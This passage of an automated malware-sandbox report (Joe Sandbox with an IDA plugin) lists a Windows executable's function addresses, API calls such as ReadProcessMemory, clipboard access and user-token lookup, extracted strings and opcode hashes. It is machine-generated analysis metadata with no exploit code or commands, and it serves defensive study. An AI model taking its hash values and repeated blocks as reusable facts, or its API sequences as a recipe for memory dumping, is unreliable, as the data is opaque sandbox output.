                                                      • Instruction ID: 20cd47f9b7f55b5c20f271b356cfeaaa962f25850266008a81d5ad0ace6d19e5
                                                      • Opcode Fuzzy Hash: 93bcda7092c4bfdc4dc742b2051549645153115191e6af116e4ee58835ec25c8
                                                      • Instruction Fuzzy Hash: 48219271500214BBE7201B21DE4EEEF7E6CEB49B65F108026FA05F11E0D7B84D419A68
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _strcmpi
                                                      • String ID: abovenormal$belownormal$high$low$realtime
                                                      • API String ID: 1439213657-3828265770
                                                      • Opcode ID: e718dd134d459b6082763e59acca76a6cffc7f2dbd1dd6810e707b04723562fc
                                                      • Instruction ID: 674ba5faec637a3ce598ef464c762c0228810fb746cc7e28ad6cf7eac0e65f56
                                                      • Opcode Fuzzy Hash: e718dd134d459b6082763e59acca76a6cffc7f2dbd1dd6810e707b04723562fc
                                                      • Instruction Fuzzy Hash: FEF0827639861415FA1921796E03BCB4288DF51B2AFB0112FF600E42C7FECC85E1419C
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 00408381
                                                      • _strcmpi.MSVCRT ref: 00408390
                                                      • _strcmpi.MSVCRT ref: 004083E1
                                                      • _strcmpi.MSVCRT ref: 004083F5
                                                      • GetForegroundWindow.USER32 ref: 0040840B
                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040841A
                                                        • Part of subcall function 0040299D: memset.MSVCRT ref: 004029D3
                                                        • Part of subcall function 0040299D: strtol.MSVCRT ref: 004029FC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _strcmpi$Window$ForegroundInitializeProcessThreadmemsetstrtol
                                                      • String ID: focused$systemsounds
                                                      • API String ID: 3889057988-605464368
                                                      • Opcode ID: 5e25f7bff4daa82e72c13680cf3d72f8df3992e822f389e435b973a561145ddf
                                                      • Instruction ID: 718d9d13023635ae923e609934f6f5eb049323e125bcab12a04cfb0ae0ea4c83
                                                      • Opcode Fuzzy Hash: 5e25f7bff4daa82e72c13680cf3d72f8df3992e822f389e435b973a561145ddf
                                                      • Instruction Fuzzy Hash: 8131C8321042067FDF106FA19D459AF3B58AF44334B11863FFAA4E21D2DE798891475D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _mbsicmp$_snprintfmemsetstrlen
                                                      • String ID: Primary$\\.\DISPLAY%s
                                                      • API String ID: 3375939262-3630482177
                                                      • Opcode ID: 66470bbfcd89d31ac7c4848213a8987f17d3f2886babfaced8daa39f9b783f99
                                                      • Instruction ID: 4c89ad1791d8848607721a74d4bfb9fd7db72191b3e393dbcefcb0e0882c714a
                                                      • Opcode Fuzzy Hash: 66470bbfcd89d31ac7c4848213a8987f17d3f2886babfaced8daa39f9b783f99
                                                      • Instruction Fuzzy Hash: DF11DA725041195AEF21AE658C01FDB3FACAF44349F14047BF944E2183E678EBC18698
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _mbscat$_mbscpymemsetstrchrstrlen
                                                      • String ID: .url$\/:*?"<>|
                                                      • API String ID: 2621195719-2798604190
                                                      • Opcode ID: 20db0751c4a48d2c3026c6140f889975b7c481aabe7e44d497bb30bfe8b06b46
                                                      • Instruction ID: 4a86d97863847695a53df0ad62104f81f5034ce80ed42e7eb1d82793896fd332
                                                      • Opcode Fuzzy Hash: 20db0751c4a48d2c3026c6140f889975b7c481aabe7e44d497bb30bfe8b06b46
                                                      • Instruction Fuzzy Hash: C6110A7241411CBEDB11AEA98C42AEEBBBC9F01308F5404ABED54B7242D6B85BC587F5
                                                      APIs
                                                      • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00402114
                                                      • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00402132
                                                      • strlen.MSVCRT ref: 0040213F
                                                      • _mbscpy.MSVCRT ref: 0040214F
                                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00402159
                                                      • _mbscpy.MSVCRT ref: 00402169
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                      • String ID: Unknown Error$netmsg.dll
                                                      • API String ID: 2881943006-572158859
                                                      • Opcode ID: 3a3ef394ac1d735f264870f41a62fae539d14c81cfca83dce277a7700da7d271
                                                      • Instruction ID: 97b3f0a5e38dcf2a2bbded905131b1240ae6be1fc2c005927144d29ad49e0a37
                                                      • Opcode Fuzzy Hash: 3a3ef394ac1d735f264870f41a62fae539d14c81cfca83dce277a7700da7d271
                                                      • Instruction Fuzzy Hash: 6801D472604214BAEB156761EE4AEDF7A68EB08790F20006AF701A51E1DAB85E90969C
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 00401342
                                                      • GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 00401356
                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId), ref: 00401365
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0040136C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$HandleLibraryLoadModule
                                                      • String ID: WTSGetActiveConsoleSessionId$WTSQueryUserToken$Wtsapi32.dll$kernel32.dll
                                                      • API String ID: 384173800-3706966797
                                                      • Opcode ID: 6348a0e7596f961508ea6e444d4c3f672460083c314aa21270812c6c8cc98636
                                                      • Instruction ID: 26eef9c0c2c4dd15919d02020d79a78441eba21bc67845e18bcb2a4146193567
                                                      • Opcode Fuzzy Hash: 6348a0e7596f961508ea6e444d4c3f672460083c314aa21270812c6c8cc98636
                                                      • Instruction Fuzzy Hash: CDE04F70A41341AEC7205FB1AD08B867EA4EB88701721C92FE346D2560C2B850D0CB18
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 00401342
                                                      • GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 00401356
                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId), ref: 00401365
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0040136C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$HandleLibraryLoadModule
                                                      • String ID: WTSGetActiveConsoleSessionId$WTSQueryUserToken$Wtsapi32.dll$kernel32.dll
                                                      • API String ID: 384173800-3706966797
                                                      • Opcode ID: efbb330000446e8a5bd1409cf15514eb86eb39e018988111ca841d5cfeb9be96
                                                      • Instruction ID: 0d1ff7833945cd92384e77ed92fb2f47f6c04f64277ab295d2034056d9d2295a
                                                      • Opcode Fuzzy Hash: efbb330000446e8a5bd1409cf15514eb86eb39e018988111ca841d5cfeb9be96
                                                      • Instruction Fuzzy Hash: 9BE0E671A453416EC7209FF5AD499867E94DA8C701351C51FF346D3560C5B851D0CB18
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000010,00000000,?), ref: 00404F5D
                                                      • GetLastError.KERNEL32 ref: 00405063
                                                        • Part of subcall function 0040218D: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,004016DF,?), ref: 0040219F
                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00404F95
                                                      • ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 00404FDC
                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00404FFF
                                                        • Part of subcall function 0040266F: ??2@YAPAXI@Z.MSVCRT ref: 00402688
                                                        • Part of subcall function 0040266F: ??2@YAPAXI@Z.MSVCRT ref: 00402692
                                                        • Part of subcall function 0040266F: sprintf.MSVCRT ref: 004026D2
                                                        • Part of subcall function 0040266F: sprintf.MSVCRT ref: 00402700
                                                        • Part of subcall function 0040266F: memcpy.MSVCRT ref: 00402711
                                                        • Part of subcall function 0040266F: memset.MSVCRT ref: 0040273D
                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040503C
                                                      • CloseHandle.KERNEL32(?), ref: 00405045
                                                      • GetLastError.KERNEL32 ref: 0040504F
                                                      • CloseHandle.KERNEL32(?), ref: 0040505B
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??2@$CloseErrorFileHandleLastProcesssprintf$??3@CreateMemoryOpenReadWritememcpymemset
                                                      • String ID:
                                                      • API String ID: 334055115-0
                                                      • Opcode ID: 44e798f75465846d2123c180c704677b93b10b8872cd875c700e04b84f409f6d
                                                      • Instruction ID: 8d6a7600804564e283efc79d49e847cea017228f8cd8c6168679aa9411aead0f
                                                      • Opcode Fuzzy Hash: 44e798f75465846d2123c180c704677b93b10b8872cd875c700e04b84f409f6d
                                                      • Instruction Fuzzy Hash: 22410671C0021AEBCF109F94D9459EFBFB5EF48310F20416AFA11B62A0D7745A50DF99
                                                      APIs
                                                        • Part of subcall function 00403049: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,00408737,?,?,?,?,004098CB,?,?,?,?), ref: 00403062
                                                        • Part of subcall function 00403049: FindClose.KERNEL32(00000000), ref: 0040308E
                                                      • memset.MSVCRT ref: 0040874E
                                                        • Part of subcall function 0040867B: memset.MSVCRT ref: 004086B0
                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004087AA
                                                      • GetLastError.KERNEL32(?,?,?,?,004098CB,?,?,?,?,?,paramsfile,?,showerror,?,?,?), ref: 004087C0
                                                      • sprintf.MSVCRT ref: 004087E8
                                                      • MessageBoxA.USER32(?,?,Error,00000030), ref: 0040880F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: memset$??3@CloseErrorFileFindLastMessageSizesprintf
                                                      • String ID: Error$Error %d: %s
                                                      • API String ID: 2289626473-1552265934
                                                      • Opcode ID: c9e360a68dde2b7a8b6b336e3219a45f34f5f322371a62579b34446d908d34f0
                                                      • Instruction ID: 2b0addeae1234f2d4df83b5ff7b58743cabf24c8023b42bd1644d3513e5ea8ef
                                                      • Opcode Fuzzy Hash: c9e360a68dde2b7a8b6b336e3219a45f34f5f322371a62579b34446d908d34f0
                                                      • Instruction Fuzzy Hash: 163152B290020DAFDB10DFA5CE819DFB7BCAB44304F14807BE645B2191DB789B858F69
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??3@CloseErrorLastMessagesprintf
                                                      • String ID: Error$Error %d: %s
                                                      • API String ID: 588451611-1552265934
                                                      • Opcode ID: 5b13c391188e7e506aac682ed7990418542ad97ca54ca3ac3e9188c1d36c7cc9
                                                      • Instruction ID: f2bfff81e589ab9835e9ea21f1fb15b41cda25448981efc368857d3edfb57076
                                                      • Opcode Fuzzy Hash: 5b13c391188e7e506aac682ed7990418542ad97ca54ca3ac3e9188c1d36c7cc9
                                                      • Instruction Fuzzy Hash: 6F11A0B1900248EBDB20AF61DC05ADA37A8AB44344F144077FE05E12B6D77C8DD1CF68
                                                      APIs
                                                      • GetLastError.KERNEL32 ref: 0040A0B9
                                                      • sprintf.MSVCRT ref: 0040A0E1
                                                      • GetProcAddress.KERNEL32(?,AbortSystemShutdownA), ref: 0040A46A
                                                      • FreeLibrary.KERNEL32(?,?,?,AbortSystemShutdownA), ref: 0040A477
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressErrorFreeLastLibraryProcsprintf
                                                      • String ID: AbortSystemShutdownA$Error$Error %d: %s
                                                      • API String ID: 2472910298-3897781915
                                                      • Opcode ID: b2b788a32d1883b12259489f9b7f81ee4a3001ece04562f743b1d2b5ba89a834
                                                      • Instruction ID: ac2001943e357a18f069c9456b0646dfe142ff3cc735175cf91749bdf5baa7fd
                                                      • Opcode Fuzzy Hash: b2b788a32d1883b12259489f9b7f81ee4a3001ece04562f743b1d2b5ba89a834
                                                      • Instruction Fuzzy Hash: B0018FB1E01254ABD7209FA1DC88DDA73ACAB08700F104077FB16E2162D77C8AD18F5D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: memset$memcpy
                                                      • String ID: W$<A
                                                      • API String ID: 368790112-3071812639
                                                      • Opcode ID: d325a2dc12cc95ed9dfb33565458ef5cee3e0695060eeba7fc4bcd62b49e775e
                                                      • Instruction ID: 500fd79071ab86fe505ed761889e1ff5b684fc80b457be196aa9ae19c503275b
                                                      • Opcode Fuzzy Hash: d325a2dc12cc95ed9dfb33565458ef5cee3e0695060eeba7fc4bcd62b49e775e
                                                      • Instruction Fuzzy Hash: 3C91FFB0210601ABD314CF14D9817A9F3B5BFD4300F25C17EE609AB7E1E3B8A991978A
                                                      APIs
                                                      • mixerOpen.WINMM(?,?,00000000,00000000,00000000), ref: 004049E0
                                                      • memset.MSVCRT ref: 004049FB
                                                      • mixerGetLineInfoA.WINMM(?,?,00000003), ref: 00404A1F
                                                      • memset.MSVCRT ref: 00404A43
                                                      • mixerGetLineControlsA.WINMM(?,?,00000002), ref: 00404A8E
                                                      • mixerGetControlDetailsA.WINMM(?,?,00000000), ref: 00404AD4
                                                      • mixerSetControlDetails.WINMM(?,?,00000000), ref: 00404B48
                                                      • mixerClose.WINMM(?), ref: 00404B52
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: mixer$ControlDetailsLinememset$CloseControlsInfoOpen
                                                      • String ID:
                                                      • API String ID: 292444528-0
                                                      • Opcode ID: 0b5423add08441b12f2c1f13951b900b79bb82f6461e71bd7c6f131234328e7d
                                                      • Instruction ID: cc02ddfe859e430582380af17401937a65d1f9b3007320c5dbb1f5fda4e92ed6
                                                      • Opcode Fuzzy Hash: 0b5423add08441b12f2c1f13951b900b79bb82f6461e71bd7c6f131234328e7d
                                                      • Instruction Fuzzy Hash: D351E4B190025CEFDB21CF68C885AEE7BB9FB48344F10416AFA15A7251E379E985CF44
                                                      APIs
                                                      • OleGetClipboard.OLE32(?), ref: 004016B1
                                                        • Part of subcall function 0040218D: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,004016DF,?), ref: 0040219F
                                                      • memset.MSVCRT ref: 00401702
                                                      • memset.MSVCRT ref: 00401733
                                                      • GetClipboardFormatNameA.USER32(?,?,0000004F), ref: 0040179E
                                                      • ReleaseStgMedium.OLE32(?), ref: 004017D2
                                                      • ReleaseStgMedium.OLE32(?), ref: 00401881
                                                        • Part of subcall function 0040162E: GlobalFix.KERNEL32(?), ref: 00401644
                                                        • Part of subcall function 0040162E: GlobalSize.KERNEL32(?), ref: 0040164D
                                                        • Part of subcall function 0040162E: GlobalUnWire.KERNEL32(?), ref: 00401658
                                                      • CloseHandle.KERNEL32(?), ref: 00401894
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Global$ClipboardMediumReleasememset$CloseCreateFileFormatHandleNameSizeWire
                                                      • String ID:
                                                      • API String ID: 1404662128-0
                                                      • Opcode ID: ab0bc29bf6e4bcb4a59d2fe8713421396d52c1826c8b1636e2b49447c61d99f2
                                                      • Instruction ID: 0d5d384d6e62ffe01dbaa586bdffd479ec0854c60e4062254db1bef4341648e4
                                                      • Opcode Fuzzy Hash: ab0bc29bf6e4bcb4a59d2fe8713421396d52c1826c8b1636e2b49447c61d99f2
                                                      • Instruction Fuzzy Hash: 2B615772900229AFCB11DFA5C8849EEB7B9BF48700F10846AE505B72A0E7359A45CFA5
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID: ServicesActive
                                                      • API String ID: 1452528299-3071072050
                                                      • Opcode ID: 5c01dd51a91895242cd9c86eafef5d441af96e48ca6306b650e42bbdfb25874f
                                                      • Instruction ID: a47c7843befa977075a05aa35dc223e48572644a5a15d880d4c44da358c00c12
                                                      • Opcode Fuzzy Hash: 5c01dd51a91895242cd9c86eafef5d441af96e48ca6306b650e42bbdfb25874f
                                                      • Instruction Fuzzy Hash: 7521FE30901205EBDF21AF61DC48BEE7BB8BF08715F148076E505B1591D7788A49DB5D
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 0040849B
                                                      • memset.MSVCRT ref: 004084F0
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,-00000200,000000FF,?,000000FF,00000000,00000000), ref: 0040850D
                                                        • Part of subcall function 00402FEE: strlen.MSVCRT ref: 00403012
                                                        • Part of subcall function 00402FEE: memcpy.MSVCRT ref: 00403032
                                                        • Part of subcall function 00402FEE: strlen.MSVCRT ref: 00403007
                                                      • MessageBoxA.USER32(00000000,00411F27,Sound Devices,00000000), ref: 0040855C
                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00408567
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: strlen$??3@ByteCharInitializeMessageMultiWidememcpymemset
                                                      • String ID: Sound Devices
                                                      • API String ID: 602576698-445005488
                                                      • Opcode ID: ff82af2667900e64cdbd587b9ebe1b2d2d097a4538d70ab161d5af8ed3d7d8d1
                                                      • Instruction ID: 6b950990b8c66530d221aa6a0c04066817447a33d84bc16703da5d5b3675b2ac
                                                      • Opcode Fuzzy Hash: ff82af2667900e64cdbd587b9ebe1b2d2d097a4538d70ab161d5af8ed3d7d8d1
                                                      • Instruction Fuzzy Hash: A421CBB180011DBFD710AF55DD859EFB77CAF04354F1041BEF615B3292D6385E848AA8
                                                      APIs
                                                      • GetLastError.KERNEL32 ref: 00409EBF
                                                      • sprintf.MSVCRT ref: 00409EE7
                                                      • MessageBoxA.USER32(?,?,Error,00000030), ref: 00409F0E
                                                        • Part of subcall function 0040E6E6: memset.MSVCRT ref: 0040E71E
                                                        • Part of subcall function 0040E6E6: memcpy.MSVCRT ref: 0040E729
                                                        • Part of subcall function 0040E6E6: strlen.MSVCRT ref: 0040E736
                                                        • Part of subcall function 0040E6E6: strcmp.MSVCRT ref: 0040E74D
                                                        • Part of subcall function 0040E6E6: GetCurrentProcess.KERNEL32 ref: 0040E75A
                                                        • Part of subcall function 0040E6E6: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040E76F
                                                        • Part of subcall function 0040E6E6: GetProcAddress.KERNEL32(00000000), ref: 0040E776
                                                        • Part of subcall function 0040E6E6: _strcmpi.MSVCRT ref: 0040E7BC
                                                        • Part of subcall function 0040E6E6: _strcmpi.MSVCRT ref: 0040E7D4
                                                        • Part of subcall function 0040E6E6: _strcmpi.MSVCRT ref: 0040E7EC
                                                        • Part of subcall function 0040E6E6: _strcmpi.MSVCRT ref: 0040E804
                                                        • Part of subcall function 0040E6E6: _strcmpi.MSVCRT ref: 0040E81C
